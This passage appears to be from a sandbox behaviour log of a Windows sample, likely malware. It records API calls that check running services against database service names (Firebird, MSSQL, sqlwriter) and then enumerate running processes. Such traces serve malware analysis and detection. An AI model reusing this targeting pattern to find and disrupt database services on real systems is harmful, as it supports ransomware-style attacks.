(lpString1="sqlwriter", lpString2="NcbService") returned 1 [0179.320] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0179.320] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0179.321] lstrlenW (lpString="netprofm") returned 8 [0179.321] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0179.321] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0179.321] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0179.321] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0179.321] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0179.321] lstrlenW (lpString="NlaSvc") returned 6 [0179.321] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0179.321] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0179.321] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0179.321] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0179.321] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0179.321] lstrlenW (lpString="nsi") returned 3 [0179.321] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0179.321] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0179.321] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0179.321] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0179.321] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0179.321] lstrlenW (lpString="PcaSvc") returned 6 [0179.321] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0179.321] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0179.321] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0179.321] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0179.321] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0179.321] lstrlenW (lpString="PlugPlay") returned 8 [0179.321] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0179.321] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0179.321] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0179.322] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0179.322] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0179.322] lstrlenW (lpString="Power") returned 5 [0179.322] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0179.322] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0179.322] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0179.322] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0179.322] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0179.322] lstrlenW (lpString="ProfSvc") returned 7 [0179.322] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0179.322] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0179.322] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0179.322] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0179.322] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0179.322] lstrlenW (lpString="RpcEptMapper") returned 12 [0179.322] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0179.322] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0179.322] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0179.322] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0179.322] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0179.322] lstrlenW (lpString="RpcSs") returned 5 [0179.322] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0179.322] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0179.322] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0179.322] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0179.322] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0179.322] lstrlenW (lpString="SamSs") returned 5 [0179.322] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0179.323] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0179.323] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0179.323] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0179.323] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0179.323] lstrlenW (lpString="Schedule") returned 8 [0179.323] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0179.323] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0179.323] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0179.323] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0179.323] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0179.323] lstrlenW (lpString="SecurityHealthService") returned 21 [0179.323] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0179.323] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0179.323] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0179.323] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0179.323] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0179.323] lstrlenW (lpString="SENS") returned 4 [0179.323] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0179.323] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0179.323] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0179.323] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0179.323] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0179.323] lstrlenW (lpString="ShellHWDetection") returned 16 [0179.323] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0179.323] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0179.323] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0179.323] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0179.323] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0179.324] lstrlenW (lpString="Spooler") returned 7 [0179.324] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0179.324] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0179.324] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0179.324] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0179.324] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0179.324] lstrlenW (lpString="sppsvc") returned 6 [0179.324] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="sppsvc") returned -1 [0179.324] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="sppsvc") returned -1 [0179.324] lstrcmpiW (lpString1="sqlwriter", lpString2="sppsvc") returned 1 [0179.324] lstrcmpiW (lpString1="mssqlserver", lpString2="sppsvc") returned -1 [0179.324] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="sppsvc") returned 1 [0179.324] lstrlenW (lpString="SSDPSRV") returned 7 [0179.324] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SSDPSRV") returned -1 [0179.324] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SSDPSRV") returned -1 [0179.324] lstrcmpiW (lpString1="sqlwriter", lpString2="SSDPSRV") returned -1 [0179.324] lstrcmpiW (lpString1="mssqlserver", lpString2="SSDPSRV") returned -1 [0179.324] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SSDPSRV") returned -1 [0179.324] lstrlenW (lpString="StateRepository") returned 15 [0179.324] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0179.324] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0179.324] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0179.324] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0179.324] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0179.324] lstrlenW (lpString="SysMain") returned 7 [0179.324] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0179.324] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0179.324] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0179.325] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0179.325] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0179.325] lstrlenW (lpString="SystemEventsBroker") returned 18 [0179.325] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0179.325] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0179.325] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0179.325] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0179.325] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x772a60 | out: hHeap=0x710000) returned 1 [0179.325] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x374 [0179.546] Process32FirstW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0179.547] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6d, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0179.547] lstrlenW (lpString="System") returned 6 [0179.548] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0179.548] lstrlenW (lpString="smss.exe") returned 8 [0179.548] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0179.549] lstrlenW (lpString="csrss.exe") returned 9 [0179.549] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0179.550] lstrlenW (lpString="wininit.exe") returned 11 [0179.550] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0179.551] lstrlenW (lpString="csrss.exe") returned 9 [0179.551] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0179.551] lstrlenW (lpString="winlogon.exe") returned 12 [0179.552] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0179.552] lstrlenW (lpString="services.exe") returned 12 [0179.552] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0179.553] lstrlenW (lpString="lsass.exe") returned 9 [0179.553] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.554] lstrlenW (lpString="svchost.exe") returned 11 [0179.554] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x220, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0179.555] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0179.555] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0179.555] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0179.556] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.556] lstrlenW (lpString="svchost.exe") returned 11 [0179.556] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x220, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0179.557] lstrlenW (lpString="dwm.exe") returned 7 [0179.557] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x65, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.558] lstrlenW (lpString="svchost.exe") returned 11 [0179.558] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.559] lstrlenW (lpString="svchost.exe") returned 11 [0179.559] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.559] lstrlenW (lpString="svchost.exe") returned 11 [0179.559] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.560] lstrlenW (lpString="svchost.exe") returned 11 [0179.560] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.706] lstrlenW (lpString="svchost.exe") returned 11 [0179.707] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.709] lstrlenW (lpString="svchost.exe") returned 11 [0179.709] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x554, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.710] lstrlenW (lpString="svchost.exe") returned 11 [0179.710] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.710] lstrlenW (lpString="svchost.exe") returned 11 [0179.710] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.711] lstrlenW (lpString="svchost.exe") returned 11 [0179.711] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.712] lstrlenW (lpString="svchost.exe") returned 11 [0179.712] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0179.713] lstrlenW (lpString="spoolsv.exe") returned 11 [0179.713] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.713] lstrlenW (lpString="svchost.exe") returned 11 [0179.713] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x554, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0179.714] lstrlenW (lpString="audiodg.exe") returned 11 [0179.714] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x708, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0179.715] lstrlenW (lpString="sihost.exe") returned 10 [0179.715] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.716] lstrlenW (lpString="svchost.exe") returned 11 [0179.716] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0179.717] lstrlenW (lpString="taskhostw.exe") returned 13 [0179.717] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x568, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0179.717] lstrlenW (lpString="explorer.exe") returned 12 [0179.717] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0179.718] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0179.718] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0179.719] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0179.719] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0179.720] lstrlenW (lpString="Memory Compression") returned 18 [0179.720] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0179.721] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0179.721] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0179.721] lstrlenW (lpString="SearchUI.exe") returned 12 [0179.721] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0179.722] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0179.722] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0179.723] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0179.723] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfe8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pending_windsor_bouquet.exe")) returned 1 [0179.724] lstrlenW (lpString="pending_windsor_bouquet.exe") returned 27 [0179.724] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xffc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="workers.exe")) returned 1 [0179.725] lstrlenW (lpString="workers.exe") returned 11 [0179.725] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x520, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="succeed.exe")) returned 1 [0179.725] lstrlenW (lpString="succeed.exe") returned 11 [0179.725] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="washer jar.exe")) returned 1 [0179.726] lstrlenW (lpString="washer jar.exe") returned 14 [0179.726] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="nights_attending_other.exe")) returned 1 [0179.727] lstrlenW (lpString="nights_attending_other.exe") returned 26 [0179.727] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="useful_courts.exe")) returned 1 [0179.728] lstrlenW (lpString="useful_courts.exe") returned 17 [0179.728] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="compounds spanish.exe")) returned 1 [0179.728] lstrlenW (lpString="compounds spanish.exe") returned 21 [0179.728] Process32NextW (in: hSnapshot=0x374, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, 